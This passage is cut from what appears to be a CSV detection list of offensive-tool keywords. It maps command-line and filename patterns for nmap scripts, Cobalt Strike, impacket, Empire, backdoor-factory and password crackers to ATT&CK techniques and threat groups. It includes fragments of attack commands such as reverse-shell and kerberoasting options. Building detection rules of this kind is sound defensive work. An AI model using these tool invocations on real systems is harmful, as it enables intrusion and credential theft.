T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2014-2127.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2014-2128.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2014-2129.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2014-3704.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2014-8877.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2015-1427.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2015-1635.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2017-1001000.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2017-5638.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2017-5689.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2017-8917.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vulners-regex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/nmap-vulners","1","0","N/A","N/A","10","3003","527","2022-12-16T11:22:30Z","2017-12-19T21:21:28Z" +"* http-vuln-misfortune-cookie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-wnr1000-creds.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-waf-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-waf-fingerprint.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-webdav-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-wordpress-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-wordpress-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-wordpress-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-xssed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -I *.bin * -Loader dll*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"* -i -H * -P * -s reverse_shell_tcp -a -u .moocowwow*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -i havex.profile *","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","0","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"* -i snmp-ips.txt -c community.txt*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" +"* iax2-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* iax2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* icap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* icebreaker.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"* -Identity * -Set @{serviceprincipalname='*'}*","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting by setting SPN","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -Identity * -XOR @{useraccountcontrol=4194304*","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting we need ACL write permissions to set UserAccountControl flags for the target user. Using PowerView","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* iec-identify.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* iis_controller.py*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" +"* ike-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -im amass -ir *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"* -im get-dns-records*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"* -im github-get-repositories*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"* -im google-get-linkedIn-employees*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"* -im grep-through-commits*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"* -im massdns*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"* imaohw*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed whoami","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* imap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* imap-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* imap-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" +"* imap-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* impacket *","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"* impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* impacket*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"* impacket.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* impacket/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* --impersonate Administrator -shell *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -impersonate* -hashes*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -ImpersonateUser *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"* import Exrop*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"* -ImportDllPathPtr *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* impress-remote-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -inc -u=0 *.pwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* -inc=digits *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 